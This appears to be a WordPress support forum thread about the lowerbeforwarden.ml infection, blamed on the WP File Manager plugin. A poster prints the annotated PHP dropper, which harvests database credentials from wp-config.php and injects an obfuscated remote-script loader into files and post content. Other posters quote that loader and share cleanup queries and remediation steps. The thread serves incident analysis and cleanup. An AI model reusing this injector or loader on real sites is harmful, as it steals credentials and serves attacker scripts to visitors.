  • I found the script that caused all this. It came from the WP File Manager plugin:

    The code that is doing the damage is:

    <?php echo "ssqqss>>>"; // marker echoed before anything else: a cheap indicator that the dropper executed (grep web logs / cached responses for it)
    error_reporting(E_ALL);
    ini_set('display_errors', 1); // verbose errors on; together with the commented-out make_it_* calls below this reads like a debug build of the injector
    
    // Entry point of this copy: start eight "../" levels above DOCUMENT_ROOT (on Linux "/.." above the root is a no-op, so on
    // typical hosting layouts this resolves to "/") and visit files whose name contains ".js". Only search_file_js() is called
    // here; search_file_ms(), search_file() and search_file_index() are defined below but never invoked from this entry point.
    search_file_js($_SERVER['DOCUMENT_ROOT'] . "/../../../../../../../../", ".js");
    die();
    
    // Return capture group 1 of the first match of regex $pat (wrapped as /.../is) in $text, or "" when nothing matches.
    // Used by show_sitenames() to scrape the DB_* define() values out of a wp-config.php. $pat is interpolated unquoted.
    function get_var_reg($pat, $text)
    {
    
    	if ($c = preg_match_all("/" . $pat . "/is", $text, $matches)) {
    		return $matches[1][0]; // first occurrence only; later matches are ignored
    	}
    
    	return "";
    }
    // Recursive walk that feeds the credential-harvesting stage: every regular file whose NAME contains $file_to_search is
    // handed to show_sitenames(), which only acts on content mentioning DB_NAME (i.e. wp-config.php). Directories are
    // descended with an error-suppressed recursive call. Not invoked from this copy's entry point.
    function search_file_ms($dir, $file_to_search)
    {
    
    	$search_array = array(); // never used
    
    	$files = scandir($dir); // no "@" here: with display_errors=1 an unreadable $dir prints a warning (a visible artifact of a run)
    
    	if ($files == false) {
    
    		$dir = substr($dir, 0, -3); // drop one trailing "../" and retry one level lower; if neither branch matches, the foreach below runs over false
    		if (strpos($dir, '../') !== false) {
    
    			@search_file_ms($dir, $file_to_search);
    			return;
    		}
    		if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {
    
    			@search_file_ms($dir, $file_to_search);
    			return;
    		}
    	}
    
    	foreach ($files as $key => $value) {
    
    		$path = realpath($dir . DIRECTORY_SEPARATOR . $value);
    
    		if (!is_dir($path)) {
    			if (strpos($value, $file_to_search) !== false) { // substring match on the name, so backup copies such as "wp-config.php.bak" (constructed example) qualify too
    
    				show_sitenames($path);
    			}
    		} else if ($value != "." && $value != "..") {
    
    			@search_file_ms($path, $file_to_search);
    		}
    	}
    }
    // Credential-theft and database-injection stage. Acts only when the file mentions DB_NAME (a WordPress wp-config.php):
    // it scrapes DB_NAME/DB_HOST/DB_USER/DB_PASSWORD with loose regexes, connects with them, and enumerates EVERY schema the
    // DB user can see for tables named like "%post%" - one site's credentials are used against every database that user can
    // reach, consistent with the cross-site spread reported in this thread. Responders should treat the credentials in every
    // wp-config.php the web user could read as compromised and rotate them.
    function show_sitenames($file)
    {
    	$content = @file_get_contents($file);
    	if (strpos($content, "DB_NAME") !== false) {
    
    		// Group 1 = the quoted value after the constant name, e.g. define('DB_NAME', "x"). ['|\"] is a character class of ' | ".
    		$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]", $content); // extracted but never used: the queries below are cross-schema
    		$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]", $content);
    		$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]", $content);
    		$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]", $content);
    
    		// Create connection
    		$conn = new mysqli($host, $user, $pass);
    
    		// Check connection
    		if ($conn->connect_error) {
    		} else {
    
    			// The <code>TABLE_NAME</code> tags are a forum-rendering artifact of backticks around TABLE_NAME in the original.
    			$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE <code>TABLE_NAME</code> LIKE '%post%'";
    			$result = $conn->query($q);
    			if ($result->num_rows > 0) {
    				while ($row = $result->fetch_assoc()) {
    					// Only one row per table is inspected (LIMIT 1); the decision below is taken from that single row.
    					$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . "  LIMIT 1 ";
    					$result2 = $conn->query($q2);
    					if ($result2->num_rows > 0) {
    						while ($row2 = $result2->fetch_assoc()) {
    							$val = $row2['post_content'];
    							// strpos() returns int|false, never true, so this condition is never satisfied and the UPDATE below is
    							// unreachable in this copy. Post rows carrying the "?n=ns1" loader (reported later in this thread)
    							// presumably came from a different build; the var_dump/exit and the inverted inner check look like
    							// leftover debugging.
    							if (strpos($val, "scripts.lowerbeforwarden.ml") === true) {
    								var_dump($val); exit;
    								if (strpos($val, "scripts.lowerbeforwarden.ml") === false) {
    
    									// Appends the remote loader to every post_content row lacking the "scripts." marker. That marker
    									// is not the host the loader itself references ("temp.lowerbeforwarden.ml"), so rows already
    									// injected by this statement would not be excluded and would be injected again on each run.
    									$q3 = "UPDATE " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . " set post_content = CONCAT(post_content,\"<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%scripts.lowerbeforwarden.ml%'";
    									$conn->query($q3);
    									echo "sql:" . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"]; // progress line per modified table
    								} else {
    								}
    							}
    						}
    					} else {
    					}
    				}
    			} else {
    			}
    			$conn->close();
    		}
    	}
    }
    
    // Walker for the HTML/PHP injection stage (make_it). In this copy both the action call and the recursive descent are
    // commented out, so as pasted it only lists the starting directory and changes nothing; the build that actually modified
    // files presumably had them active. Not invoked from this copy's entry point either.
    function search_file($dir, $file_to_search)
    {
    
    	$files = @scandir($dir);
    
    	if ($files == false) {
    
    		$dir = substr($dir, 0, -3); // drop one trailing "../"; the retry calls are commented out, so this just returns
    		if (strpos($dir, '../') !== false) {
    
    			//@search_file($dir, $file_to_search);
    			return;
    		}
    		if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {
    
    			//@search_file($dir, $file_to_search);
    			return;
    		}
    	}
    
    	foreach ($files as $key => $value) {
    
    		$path = realpath($dir . DIRECTORY_SEPARATOR . $value);
    
    		if (!is_dir($path)) {
    			// Target selection: name contains $file_to_search AND (".ph" or ".htm"). The closing parenthesis is misplaced:
    			// the trailing "!== false" applies to the whole OR, so the ".htm" test degrades to a truthiness check on its offset.
    			if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) {
    
    				//make_it($path);
    			}
    		} else if ($value != "." && $value != "..") {
    
    			//search_file($path, $file_to_search);
    		}
    	}
    }
    
    // Walker for the index-file injection stage (make_it_index). Same skeleton as search_file(): in this copy the action
    // call and the recursive descent are commented out, so as pasted it only lists the starting directory and changes
    // nothing. Not invoked from this copy's entry point.
    function search_file_index($dir, $file_to_search)
    {
    
    	$files = @scandir($dir);
    
    	if ($files == false) {
    
    		$dir = substr($dir, 0, -3); // drop one trailing "../"; the retry calls are commented out, so this just returns
    		if (strpos($dir, '../') !== false) {
    
    			//search_file_index($dir, $file_to_search);
    			return;
    		}
    		if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {
    
    			//search_file_index($dir, $file_to_search);
    			return;
    		}
    	}
    
    	foreach ($files as $key => $value) {
    
    		$path = realpath($dir . DIRECTORY_SEPARATOR . $value);
    
    		if (!is_dir($path)) {
    			// Same misplaced parenthesis as in search_file(): the outer "!== false" wraps the whole OR, so the ".htm"
    			// test is effectively a truthiness check on its offset.
    			if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) {
    
    				//make_it_index($path);
    			}
    		} else if ($value != "." && $value != "..") {
    
    			//search_file_index($path, $file_to_search);
    		}
    	}
    }
    // Walker for the .js injection stage (make_it_js); this is the function the entry point at the top calls. As pasted,
    // the make_it_js() call and the recursive descent are commented out, so this copy lists the starting directory and
    // writes nothing; the build that actually modified .js files presumably had them active.
    function search_file_js($dir, $file_to_search)
    {
    
    	$files = @scandir($dir);
    	if ($files == false) {
    
    		$dir = substr($dir, 0, -3); // drop one trailing "../"; the retry calls are commented out, so this just returns
    		if (strpos($dir, '../') !== false) {
    
    			//@search_file_js($dir, $file_to_search);
    			return;
    		}
    		if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {
    
    			//@search_file_js($dir, $file_to_search);
    			return;
    		}
    	}
    
    	foreach ($files as $key => $value) {
    
    		$path = realpath($dir . DIRECTORY_SEPARATOR . $value);
    
    		if (!is_dir($path)) {
    			// Name must contain $file_to_search and ".js"; with the entry point passing ".js" the second test is redundant.
    			if (strpos($value, $file_to_search) !== false && (strpos($value, ".js") !== false)) {
    
    				//make_it_js($path);
    			}
    		} else if ($value != "." && $value != "..") {
    
    			//search_file_js($path, $file_to_search);
    		}
    	}
    }
    
    // JavaScript injection stage: prepend the obfuscated loader to a .js file. The String.fromCharCode() sequences in $l2
    // decode to "script", "text/javascript", "https://temp.lowerbeforwarden.ml/temp.js" and "head": the payload creates a
    // <script> element pointing at that host and attaches it to <head>. Not called from this copy (see search_file_js).
    function make_it_js($f)
    {
    	$g = file_get_contents($f);
    
    	// Intended "already infected" guard. The needle decodes to "scripts.lowerbeforwarden.ml", but the loader written below
    	// encodes "temp.lowerbeforwarden.ml", so $l2 never contains this needle and the guard does not stop re-injection.
    	// That explains the back-to-back duplicate copies of the loader reported in .js files further down this thread.
    	if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false) {
    	} else {
    
    		$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
    		$g = file_get_contents($f); // redundant re-read of the same file
    		$g = $l2 . $g; // loader goes at byte 0, ahead of the original script
    		@system('chmod 777 ' . $f); // forces the file world-writable before writing; world-writable .js/.php files are a useful IoC for this infection
    		@file_put_contents($f, $g);
    		echo "js:" . $f . "\r\n"; // progress line per modified file
    	}
    }
    // Index/HTML injection stage: prepend a plain <script src="https://temp.lowerbeforwarden.ml/temp.js?n=nb5"> tag to the
    // file. Not called from this copy (see search_file_index).
    function make_it_index($f)
    {
    
    	// $g is read here BEFORE it is assigned (the file is only loaded in the else branch), so both strpos() calls run on an
    	// undefined variable (notice + empty haystack) and the guard is never true: every run re-injects the tag. Consistent
    	// with the tripled "?n=nb5" tags and the code-before-<!DOCTYPE> in header.php reported later in this thread.
    	if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false || strpos($g, 'scripts.lowerbeforwarden.ml') !== false) {
    	} else {
    		$l2 = "<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>";
    		$g = file_get_contents($f);
    		$g = $l2 . $g; // injected at byte 0, i.e. before any <!DOCTYPE> or <?php opening tag
    
    		@system('chmod 777 ' . $f); // leaves the file world-writable (IoC)
    		@file_put_contents($f, $g);
    		echo "in:" . $f . "\r\n"; // progress line per modified file
    	}
    }
    
    // HTML/PHP injection stage: insert the same obfuscated loader as make_it_js(), wrapped in a <script> tag, into the
    // document head of files selected by search_file(). Not called from this copy.
    function make_it($f)
    {
    	$g = file_get_contents($f);
    	// Same ineffective guard as make_it_js(): the needle ("scripts.lowerbeforwarden.ml" as char codes) does not occur in
    	// $l2, which encodes "temp.lowerbeforwarden.ml", so a file is injected again on every run.
    	if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false) {
    	} else {
    		$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
    		// Two independent writes, each derived from the ORIGINAL $g: when a file contains both <head> and </head>, the
    		// second write overwrites the first, so the surviving copy sits just before </head>.
    		if (strpos($g, '<head>') !== false) {
    			$b = str_replace("<head>", "<head>" . $l2, $g); // every occurrence of <head>, not just the first
    			@system('chmod 777 ' . $f); // leaves the file world-writable (IoC)
    			@file_put_contents($f, $b);
    			echo "hh:" . $f . "\r\n";
    		}
    		if (strpos($g, '</head>') !== false) {
    			$b = str_replace("</head>", $l2 . "</head>", $g);
    			@system('chmod 777 ' . $f);
    			@file_put_contents($f, $b);
    			echo "hh:" . $f . "\r\n"; // same progress prefix for both placements
    		}
    	}
    }
    

    I was trying to reverse engineer the hack.

    The code injects into .js files and index files. It also injects into any file that contains <head>. In addition, it reads the database credentials (DB_NAME, DB_HOST, DB_USER, DB_PASSWORD) out of any wp-config.php it finds and uses them to write the loader directly into post content in the database.

    The first step would be to remove every occurrence of these scripts. I used VSCode to remove them by searching for:

    Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
    

    and

    
    <script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>
    

    After that, run this query against your SQL database.

    
    UPDATE wp_posts
    SET 
        post_content = REPLACE(post_content,
            "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>",
            '')
    WHERE
        post_content LIKE '%lowerbeforwarden%';
    

    If you have W3 cache or any other cache plugin, remove the cache directory.

    It had infected more than 12 sites on my server, including other PHP projects that were hosted there.

    Hope it helps.

    I have the same problem, is there anybody that can help us?

    Hello allmassim, I can do this using MySQL queries.

    I have the same problem with the following code:

    
    <script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script><script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script><script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>
    

    Can anybody help us? Wordfence was enabled….


    Nasty new malware that gets in via WP File Manager. Walkthrough video on how to fix on the following link.

    https://dorset.tech/nasty-new-malware-doing-the-rounds-lowerbeforwarden-ml/

    Hi @jazzmavericks
    That’s right. We blamed Wordfence wrongly. The link you mentioned was a great help. I have many websites on my VPS and just one of them has this issue. The one that has WP File Manager. But they had a security update 5 days ago and they seem to have made a mess! :/


    Great analysis, “safalshrestha”, which may help us all solve the problem. I’m just a user and not a professional; all I have is 8-day-old backups and access to my admin panel. I can’t look through 500 files searching for the malicious code, but I can tell my provider to restore the backup from 1.9. – but that won’t be enough, will it?
    What do I have to do to prevent these idiots from coming back in through the back door ?

    what is your instruction ?

    – first: delete WP file manager or install an update – and then ?


    Hi @khubaib927,

    my template is missing … regards, Helmut

    @khubaib927 can you please give me a hand with the files and mysqls codes??

    To remove the script from the database, any of these 3 queries may help; you need to identify which one applies to your site. Also replace the table prefix with yours.

    UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5' type='text/javascript'></script>", " "));
    
    UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>", " "));
    
    UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", " "));
    

    Dear

    My website also appears to be hacked. Weirdly enough, I have several subsites hosted on the same domain name (even clones of the main website) that are (still) unaffected.

    The above solutions did not work for me. I’d love to know a solution that fixes my problem – and maybe a solution to prevent this from happening on my other subsites.

    I hope we find the solution for this one soon, because it’s spooking me out a lot! I can’t quite grasp how this happened.

    Thanks in advance
    Best regards

    All 3 of my websites on the same hosting were hacked, with the same redirect issue; they change the permissions of folders and files, especially .php and .js files, and folder permissions.

    Is there any fast way to fix this? A search-and-replace method for the redirect code? I changed the MySQL entries where the link was showing, but it is still not fixed 🙁

    @khubaib927 please guide us if you can,

    I’ve followed the steps from julioanampa by heart and i’ve found these scripts in all my posts.

    Also I’ve found in my JS files a long script like this:

    Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = 
String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    My site is returning to normal now.

    same problem
    Step 1: check your database options file; it has been changed to a malicious name.
    Rename it.
    Step 2: go to your theme's header.php and check for <!DOCTYPE html>. If there is any code before <!DOCTYPE html>, delete it, and also check that file for any other malicious code and remove it safely.

    Step 3: delete the mu-plugin folder in the File Manager plugin section.
    Step 4: scan with Wordfence and remove all infected files.
    Step 5: scan the entire cPanel (or your control panel) to check whether other domains on the same File Manager system are infected.
